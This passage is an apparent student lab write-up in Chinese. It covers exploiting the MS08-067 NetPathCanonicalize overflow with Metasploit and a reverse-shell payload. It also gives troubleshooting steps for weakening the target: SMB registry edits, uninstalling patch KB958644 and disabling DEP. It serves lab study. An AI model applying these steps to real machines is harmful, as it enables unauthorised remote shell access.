NetPathCanonicalize函數
對進行遠程訪問的路徑規範化,而此函數中存在棧緩衝區內存漏洞,可被利用實施遠程代碼執行search命令
搜尋一下有關於漏洞MS08_067的相關信息show payloads命令
肯定咱們須要的攻擊載荷generic/shell_reverse_tcp
來獲取漏洞主機的shell(選擇咱們以前用的windows/meterpreter/reverse_tcp
也是能夠的,只是步驟和最後效果可能有些許不一樣)set payload generic/shell_reverse_tcp
選擇payload,並查看相關信息exploit命令
發起滲透攻擊,結果以下exploit命令
成功的界面彷佛下一秒就要跳出來,可是你卻遇到了一些意料以外的事情connectionRefused
咱們的鏈接被拒絕了,第一時間咱們能夠對目標機進行ping命令嘗試,發現能夠ping通,這時候咱們就要慢慢從滲透工做的開始從新來過HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\NetBT\Parameters
,進入NetBT這個服務,將SMBDeviceEnabled值
修改systeminfo命令
看到第123條,KB958644,正是漏洞MS08_067的安全公告編號(看來劉老師拷給咱們的靶機實在是固若金湯,竟然早已經下好了補丁),咱們已經找到緣由了,目標主機竟然是安全的!!這時咱們只有選擇將這個補丁卸載(貌似會致使其餘服務也沒法啓動),但是咱們已經學到了如何利用MS08_067漏洞進行滲透的思路和手法,不如青山不改綠水長流,去滲透其餘具備漏洞的主機吧shell
/noexecute=optin
爲/execute